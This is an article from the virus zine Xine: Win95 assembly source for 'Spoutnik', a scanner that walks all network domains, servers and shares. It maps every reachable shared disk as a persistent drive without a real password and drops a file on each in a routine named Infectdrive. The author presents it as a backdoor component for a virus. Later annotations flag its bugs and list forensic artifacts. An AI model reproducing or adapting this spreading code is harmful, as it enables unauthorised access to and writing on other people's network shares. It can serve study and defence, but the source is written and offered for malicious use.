
Xine - issue #4 - Phile 302

Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 302 |
\-----------------------------/


;
; This scanner was built on this principle (ikx)
;
; if domain-server-generic found then scan again
; if connectable disk found then mount it
;
; This small application connects every shareable resource on the network;
; even when no password is given, Windows seems to connect the resource anyway.
; This was not foreseen initially. Does Windows itself find and take
; the password from the cache?
; Yeah, it's a win95 backD00r: it makes things simpler, but it hides the
; password from the user himself; even the virus doesn't know the password
;
; This program shows how to connect a drive (ikx)
; This program also has a fixed amount of memory for scanning each type, so it
; can't walk a 100% complete tree; it will be limited somewhere...
;
; Spoutnik 3 will fix this problem
;
; This part of code was coded under windows95, tested on windows98
; KRRRASHED on windows NT
; So NT users, don't panic and reformat your drive, install windows95, and
; afterwards you will be able to use this program
; Otherwise, you can debug this program and send me the working version for NT
;
; I will not do it myself, I'm in time deficit you know....
;
; Greetz(×kx): Frederrico <- the Belgian Beer Killer! ;)
; and some s0 UnD4RGRooND PO3pl3 th4t N0bodY kn0\X/
;
; hope you enjoy the Code
; Ikx/Ikx(ikx1999)



.386
locals
.model flat

;Define the needed external functions and constants here.

extrn ExitProcess:PROC
extrn MessageBoxA:Proc
extrn WNetOpenEnumA:Proc
extrn WNetCloseEnum:Proc
extrn WNetEnumResourceA:Proc
extrn WNetAddConnection2A:Proc
extrn WNetCancelConnection2A:Proc
extrn GetCommandLineA:Proc
extrn MessageBoxA:Proc
extrn HeapCreate:Proc
extrn HeapAlloc:Proc
extrn HeapDestroy:Proc
extrn GetLastError:Proc
extrn CreateFileA:Proc
extrn WriteFile:Proc
extrn _lclose:Proc

; Static data for the scanner.
; Tempdrive, tmpflag and Tempfile are consecutive bytes: Infectdrive switches
; tmpflag between 0 and '\' so the same bytes read either as "<letter>:" or as
; "<letter>:\create.txt".
.data ;the data area

; Drive-letter string used as the local device name. Starts one past 'Z' and is
; decremented before each connection attempt; Fini1 compares it with 'Z'+1 to
; decide whether anything was connected.
Tempdrive: db 'Z'+1,':' ; but I will
; 0 here terminates "<letter>:"; set to '\' only around the CreateFileA call.
tmpflag: db 0
; Name of the file created on a connected share; also the buffer passed to WriteFile.
Tempfile: db 'create.txt',0
; Receives the byte count written by WriteFile.
iobytes: dd 0

; Not referenced by any code visible on this page.
Handle: dd 0
; Four dword pairs. Alloc is given the address of the first dword of a pair and
; stores the HeapCreate result at +0 and the HeapAlloc result at +4, so the
; "MemPointerN" slot receives the HeapCreate value and "MemHandleN" the
; HeapAlloc value.
MemPointer: dd 0
MemHandle: dd 0
MemPointer2: dd 0
MemHandle2: dd 0
MemPointer3: dd 0
MemHandle3: dd 0
MemPointer4: dd 0
MemHandle4: dd 0


; 80 zero-initialised bytes followed by 800 uninitialised bytes. The copy loop
; at gototheree writes here without any length limit.
Password: dd 20 dup (0) ; hahaha I removed my password
db 800 dup (?)

.code ; executable code starts here

; Program entry point (named by "end HOST").
; Reads the process command line; if it contains a space, the bytes after the
; first space are copied into the Password buffer. Falls through to
; dothatanyway in every case.
HOST:

Starthere:

call GetCommandLineA ; look if any password entered

mov esi,eax ; esi walks the command-line string returned in eax
dothattozero:
; esi is advanced before the test, so the first byte of the string is never
; examined. The search stops at the first space anywhere in the string,
; which may be inside the program path.
inc esi
cmp byte ptr [esi],20h ; if space then so
je thengother

cmp byte ptr [esi],0 ; if nothing then set default
jne dothattozero
jmp dothatanyway

thengother:
mov edi,offset Password ; set password

gototheree:
; Both pointers are advanced before the first store: the first copied byte
; lands at Password+1 and Password+0 keeps its initial 0, so the buffer still
; reads as an empty string from its start.
; NOTE(review): there is no bound on the copy and the terminating 0 is not
; stored; a long argument runs past the 880 bytes reserved for Password.
inc esi
inc edi
mov al,byte ptr [esi] ; get password characters
cmp al,0
je dothatanyway ; end of paswword ?

mov byte ptr [edi],al
jmp gototheree ; loop


; Creates the four scan buffers (one per MemPointerN/MemHandleN pair) and opens
; the top-level network enumeration.
; Alloc inputs: edx = address of the pair to fill, ebx = size (0FFFFh/2 bytes).
dothatanyway:

mov edx,offset MemPointer ; alloc first memory for
mov ebx,0FFFFh/2 ; scanning
Call Alloc

mov edx,offset MemPointer2
mov ebx,0FFFFh/2
Call Alloc ; memory 2

mov edx,offset MemPointer3 ; memory 3
mov ebx,0FFFFh/2
Call Alloc

mov edx,offset MemPointer4 ; memory4
mov ebx,0FFFFh/2
Call Alloc

; NOTE(review): dec/inc do not modify CF, so this jc tests whatever carry the
; fourth Alloc call left behind. The first three calls are not checked at
; all, and on Alloc's success path the last flag-setting instruction is
; followed by an API call, so the state of CF here is not guaranteed.
dec eax
jc Fini ; can't allocate, then finish!
inc eax

; eax = 0 is passed as the NETRESOURCE pointer (no parent container) and
; ebx = dword stored at MemPointer is passed as the address that receives the
; enumeration handle.
mov eax,0
mov ebx,dword ptr [MemPointer]
call Globalconnection ; open the connection to
; the global networks
jc Fini1 ; in order to scan ressources


; Top-level scan loop: fetch a batch of entries into buffer 1, walk them with
; scanall, repeat. The only exit is jc Fini, taken on any non-zero
; WNetEnumResourceA result, which includes the normal end-of-enumeration code.
; Scanshare also jumps back to this label from inside nested calls.
Nextone:

mov eax,dword ptr [MemPointer]
Call EnumResource ; get all 1st entries
jc Fini ; generally the Domain
; or Generic
mov esi,dword ptr [MemPointer]
call scanall ; then we scan sub entries
jmp Nextone


; scanall - visit every entry of one enumeration batch.
; In:  esi = scan buffer as filled by EnumResource
;            (+4 = entry count, +0Ch = first 32-byte NETRESOURCE entry)
; Out: all general registers restored by pushad/popad.
; Calls scaneachtype once per entry; the handlers reached from there call
; scanall again on other buffers, so this routine is re-entered recursively.
scanall:
pushad ; we scan
mov ecx,dword ptr [esi+04] ; look to the Netressource
lea edi,[esi+0Ch] ; structure, looking for
; types...
scaneach:

; edi and ecx are saved around the call because the handlers use them freely.
push edi
push ecx
call scaneachtype ; Now we do the ring scanner
pop ecx
pop edi
add edi,32 ; advance by one 32-byte entry

; NOTE(review): a count of 0 at [esi+4] would make "loop" wrap ecx and run
; far past the buffer; the code relies on the count being at least 1.
loop scaneach
popad ; Ikx
ret


; scaneachtype - dispatch on the dword at offset 8 of the entry at edi.
; In: edi = one 32-byte NETRESOURCE entry.
; The handlers are reached with je, not call, so each handler's ret returns
; directly to scanall. Unmatched values return without doing anything.
; NOTE(review): offset 8 of NETRESOURCE is dwDisplayType, whose documented
; values are 1 = domain, 2 = server, 3 = share, 6 = network. The label names
; below do not follow those meanings: "Scanshare" handles servers,
; "Scangroup" handles domains and "Scandomain" handles networks.
scaneachtype:

cmp dword ptr [edi+8],2 ; Scan for sharing ressource
je Scanshare ; not necessary disk but
; shared directories...
cmp dword ptr [edi+8],1
je Scangroup ; scan the group
cmp dword ptr [edi+8],3
je Infectdrive
cmp dword ptr [edi+8],6
je Scandomain ; scan the domain
ret


; Scandomain - enumerate the children of the entry at edi using buffer 2.
; In: edi = NETRESOURCE entry whose offset-8 field is 6.
; Opens an enumeration on the entry, then repeatedly fetches batches and walks
; them with scanall until EnumResource reports a non-zero result.
; NOTE(review): buffer 2 is shared by every activation of this handler, so a
; nested entry of the same kind would overwrite the batch the outer level is
; still walking. This matches the "fixed memory" limit the author describes.
Scandomain:

mov ebx,dword ptr [MemPointer2]
mov eax,edi
call Globalconnection ;ask for connection...
jc scandomainfin


scandomain2:

mov eax,dword ptr [MemPointer2]
Call EnumResource ; ask for entries
jc scandomainfin

mov esi,dword ptr [MemPointer2]
call scanall ; scan subentries
jmp scandomain2

scandomainfin:

; Also reached when the open failed, in which case the handle slot holds
; whatever was there before.
mov eax,dword ptr [MemPointer2]
call closeenum ; close the ennumeration
ret


; Scangroup - enumerate the children of the entry at edi using buffer 3.
; In: edi = NETRESOURCE entry whose offset-8 field is 1.
; Same open / fetch / scanall / close shape as Scandomain, on MemPointer3.
Scangroup:

mov ebx,dword ptr [MemPointer3]
mov eax,edi
call Globalconnection ; scan the group
jc scangroupfin

scangroup2:

mov eax,dword ptr [MemPointer3]
Call EnumResource ; ask for entries
jc scangroupfin

mov esi,dword ptr [MemPointer3]
call scanall ; scan sub entries

jmp scangroup2

scangroupfin:

; Also reached when the open failed; the handle slot is then stale.
mov eax,dword ptr [MemPointer3]
call closeenum
ret


; Scanshare - enumerate the children of the entry at edi using buffer 4.
; In: edi = NETRESOURCE entry whose offset-8 field is 2.
; Offset 20 (14h) of NETRESOURCE is lpRemoteName; entries without a remote
; name are skipped.
Scanshare:

cmp dword ptr [edi+20],0
; NOTE(review): this jumps to the top-level loop from inside the
; scanall/scaneachtype call chain without unwinding, so the return addresses,
; the two saved registers and the pushad frame stay on the stack each time it
; is taken.
je Nextone ; test if this is a remote things

mov ebx,dword ptr [MemPointer4]
mov eax,edi
call Globalconnection ; scan for sub connections
jc scanusefini ; in machine

scanuse2:

mov eax,dword ptr [MemPointer4]
Call EnumResource ; ask for entries
jc scanusefini

mov esi,dword ptr [MemPointer4]
call scanall

jmp scanuse2

scanusefini:

; Also reached when the open failed; the handle slot is then stale.
mov eax,dword ptr [MemPointer4]
call closeenum ; close enumeration
ret


; Infectdrive - map the share described by the entry at edi to a local drive
; letter and drop a marker file on it.
; In: edi = NETRESOURCE entry whose offset-8 field is 3.
; Artifacts a responder can look for, all taken from this listing: drive
; mappings assigned downward from Z: that are never cancelled, and a file
; named create.txt in the root of each mapped share holding the 8 bytes
; "create.t".
Infectdrive:

; Offset 16 (10h) of NETRESOURCE is lpLocalName.
mov dword ptr [edi+16],offset Tempdrive ; we have to set
; the Local name as a drive
; letter 'Ex:F: etc etc'
; here I choose to start
; from Z to go to A
; Step to the next candidate letter. Nothing stops the count at 'A'.
dec byte ptr [Tempdrive]

; Arguments pushed right to left: dwFlags, lpUserName, lpPassword, lpNetResource.
; NOTE(review): 0FF000000h is not the documented CONNECT_UPDATE_PROFILE value
; (1); how Windows treats these bits is not visible here.
; Password+0 is never written by the start-up copy loop, so the string passed
; here is empty; the header's remark that Windows connects anyway is consistent
; with shares that accept no password or a cached one.
push 0FF000000h ; persistant
push 0 ; default user...
push offset Password ; seems not really need
push edi ; the NEtressource table
Call WNetAddConnection2A ; Now we connect
cmp eax,0
jne Cantconnect

; CreateFileA arguments, right to left: hTemplateFile, dwFlagsAndAttributes
; (80h), dwCreationDisposition (1), lpSecurityAttributes, dwShareMode,
; dwDesiredAccess, lpFileName.
; NOTE(review): disposition 1 is CREATE_NEW, which fails when the file already
; exists, despite the "allways" in the comment below. The access mask is
; GENERIC_READ or GENERIC_WRITE, not read only.
push large 0
push large 80h
push large 1 ; create allways new
push large 0
push large 0
push 80000000h or 40000000h ; create the file in read
push offset Tempdrive
; With tmpflag = '\' the bytes at Tempdrive read "<letter>:\create.txt".
mov byte ptr [tmpflag],'\' ; this just for F:\blabla
Call CreateFileA ; create a file
; This second dec is undone by the inc at Cantconnect, so after a successful
; connection Tempdrive holds the letter just used.
dec byte ptr [Tempdrive]
mov byte ptr [tmpflag],0
; eax = -1 (INVALID_HANDLE_VALUE) becomes 0 after inc.
inc eax
jz Disconnect

dec eax
push eax ; handle kept on the stack as the _lclose argument

; WriteFile arguments, right to left: lpOverlapped, lpNumberOfBytesWritten,
; nNumberOfBytesToWrite, lpBuffer, hFile. The result is not checked.
push 0
push offset iobytes
push 8
push offset Tempfile
push eax
Call WriteFile ; write 8 byte on the file
; close it
Call _lclose

Disconnect:

; The cancel call is commented out, so every mapping made above stays in place
; after the program exits.
; push 0 ; NORMALLY WE HAVE TO CANCEL
; push 1 ; THE CONNECTION WHEN FINISH
; push offset Tempdrive
; Call WNetCancelConnection2A

Cantconnect:
; Failure path: restores the letter consumed by the first dec.
; Success path: cancels the second dec (see above).
inc byte ptr [Tempdrive]

ret


; EnumResource - fetch the next batch of entries for an open enumeration.
; In:  eax = scan buffer base. Layout used here:
;            +0  enumeration handle (written by WNetOpenEnumA)
;            +4  entry count (in: -1, out: number returned)
;            +8  buffer size in bytes (in: 32000)
;            +12 start of the NETRESOURCE array
; Out: CF = 1 when WNetEnumResourceA returned non-zero, CF = 0 when it
;      returned 0; eax = API result minus 1.
; Clobbers: ecx, edx, and whatever the API call clobbers.
EnumResource:

lea ecx,[eax+8] ; heap organisation...

mov edx,32000
mov dword ptr [ecx],edx ;
push ecx ; buffer size

lea ecx,[eax+12]
push ecx ; buffer = heap +12

; -1 asks for as many entries as fit in the buffer.
mov dword ptr [eax+4],-1
lea ecx,[eax+4]
push ecx ; number of entries = 0FFFFFFFh

push dword ptr [eax] ; handle
Call WNetEnumResourceA
; Adding -1 carries for every value except 0, which turns the result into the
; CF convention the callers test with jc.
add eax,-1
ret


; closeenum - close the enumeration whose handle is stored at [eax].
; In:  eax = scan buffer base (handle at +0).
; Out: eax = WNetCloseEnum result; no caller on this page checks it.
closeenum:

push dword ptr [eax]
Call WNetCloseEnum
ret


; Globalconnection / Contextconnection / Netconnection - open an enumeration.
; In:  eax = NETRESOURCE pointer of the container to open, or 0 for the root
;      ebx = address that receives the enumeration handle
; Out: CF = 1 when WNetOpenEnumA returned non-zero; eax = API result minus 1.
; The two entry labels differ only in the scope value loaded into ecx
; (2 = RESOURCE_GLOBALNET, 5 = RESOURCE_CONTEXT). Contextconnection is not
; referenced by any code visible on this page.
Globalconnection:

mov ecx,2
jmp Netconnection

Contextconnection:

mov ecx,5

Netconnection:

; Arguments pushed right to left: lphEnum, lpNetResource, dwUsage, dwType, dwScope.
push ebx
push eax
push large 3 ; fwdusage
push large 1 ; fwdtype , get only disks
push ecx ; fwdscope
call WNetOpenEnumA
; Same non-zero-to-carry conversion as in EnumResource.
add eax,-1
ret


; Alloc - create a private heap and allocate one zero-filled block from it.
; In:  edx = address of a dword pair to fill, ebx = size in bytes
; Out: [edx+0] = HeapCreate result, [edx+4] = HeapAlloc result
;      eax = HeapAlloc result, or 1 with CF = 1 when HeapCreate returned 0
; NOTE(review): the HeapAlloc result is not checked, and callers load the
; dword at +0 (the HeapCreate result) when they need a buffer address.
Alloc: ; Hacked from Explorer.exe
; given with window95 Chicago
; ver 4.00.950 line#0040D0DE
; **normally** works with
push edx ; NT but allways...
push edx

; HeapCreate arguments, right to left: dwMaximumSize (0), dwInitialSize (ebx),
; flOptions (0).
push 0
push ebx
push 0
Call HeapCreate

pop edx
mov dword ptr [edx],eax

cmp eax,0
jz AllocBad

; HeapAlloc arguments, right to left: dwBytes, dwFlags (8 = HEAP_ZERO_MEMORY),
; hHeap. The size is ebx - 1, assuming ebx survived the HeapCreate call.
dec ebx
push ebx
push 8h
push eax
Call HeapAlloc

pop edx
mov dword ptr [edx+4],eax

ret

; NOTE(review): one of the two saved edx copies is still on the stack here, so
; this ret pops that data address instead of the caller's return address.
; 0 - (-1) borrows, giving eax = 1 and CF = 1.
AllocBad: sub eax,-1
ret


; Deloc - release scan memory before exit.
; Calls HeapDestroy on the dwords at MemHandle and MemHandle2 only; pairs 3
; and 4 are not touched.
; NOTE(review): per Alloc, the MemHandleN slots hold the HeapAlloc results,
; while the HeapCreate results are in the MemPointerN slots. The return values
; are ignored and the process exits right after this routine.
Deloc:

push dword ptr [MemHandle]
Call HeapDestroy
push dword ptr [MemHandle2]
Call HeapDestroy

ret



; Fini / Fini1 - shutdown path.
; Fini closes the top-level enumeration first; Fini1 is entered directly when
; that enumeration could not be opened. A message box is shown only when
; Tempdrive still holds its initial value 'Z'+1, i.e. no connection succeeded.
; The process always exits with code -1.
Fini:

mov eax,dword ptr [MemPointer]
call closeenum ; finish global connection

Fini1:
call Deloc
cmp byte ptr [Tempdrive],'Z'+1
jne thenskipbox

; MessageBoxA arguments, right to left: uType, lpCaption (BoxMsg2),
; lpText (BoxMsg), hWnd.
push 0 ; put the small box if nutin
push offset BoxMsg2 ; connected
push offset BoxMsg
push 0
call MessageBoxA

thenskipbox:
push LARGE -1
call ExitProcess ;this simply terminates the program


; Message-box strings, placed in the code section after ExitProcess.
; BoxMsg2 is the caption and BoxMsg the text.
; NOTE(review): BoxMsg has no 0 terminator in the bytes shown, so MessageBoxA
; reads on until it meets a zero byte in whatever follows. Each line break is
; emitted as 10,13 (LF then CR).
BoxMsg2: db ' Spoutnik_2^ikx II{IkX}',0
BoxMsg: db ' No ressource connected!',10,13,10,13
db ' Correct syntax: spoutnik (password)',10,13
db ' Ex: spoutnik jennajameson',10,13,10,13
db 'Nota bene:password is not necesseary',10,13

ends
end HOST



